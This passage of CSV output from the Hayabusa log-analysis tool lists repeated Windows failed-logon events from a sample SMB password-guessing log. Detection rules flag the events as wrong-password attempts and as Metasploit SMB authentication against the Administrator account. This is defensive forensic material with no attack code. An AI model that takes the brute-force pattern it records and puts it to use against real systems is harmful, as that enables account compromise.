NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oGlR6pBLnDrzMsqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gv7nWzZ1HN9mgTya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dnPUb3w2d7Ltif2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCWXdvBeDPpeKhWJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GN3OXSzQqLDF348i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAWiBhYPNQ0RUuOX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: V5CBG3hblqr8kvWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MDBaKpfYttm4H1gj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PNszt6piEznMlTdF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iqmBPOQIG6M1rZjX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJs7tuZpsPMYJHOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LUT5oe2DwS5vW84K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3OTe0uiDHhf5GzRL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71TuxFRZFyZEQp1S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRvTmizOLj3UUpD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LnQEZPWaN2OkpTLa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: HnHR9DAtgzu561sx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfBl3dbluZ7GiFum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Hlgn7gsZwRvlXAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eyHVPtGpnmmRjJuO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0l3QC0rLt9yGaIe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XfEng3JgXLmgI8GN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ORIegzlkHy8AX6RW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AzS4xRnHKxSwz5sZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0hA1XvRIlqwKG6g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mKXKkvlHvjRh33Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JIMTGRC5IQlkrG9c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NYcLsxwbg8LkGCuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kmttijRBtXqEbU0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXC3hYI1Gin59gvG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQiozAIr9Jgklmks : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O598IvZRpbdU1liO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xlmYWrAnn3sUNSRk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aAAkO0uOGIq8zVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 26K4BIpgUbBNWbDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moW3Ts7edqoQ9XeU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: l8C4d3xE0QkWywbf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K1EgYFhtgrcjtcXM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.086 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7avpgQeA0KCIme9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFgmt3OEw4cDfPhG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OqITdE5K63nJg9tg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.214 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zBs4fYCiprxgDd43 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBD0Q2szeURxMYA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KPUi2NhPP92Rs3hy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PrbMf9E0fOuwIB8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 807zsxQ9WETO9YIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
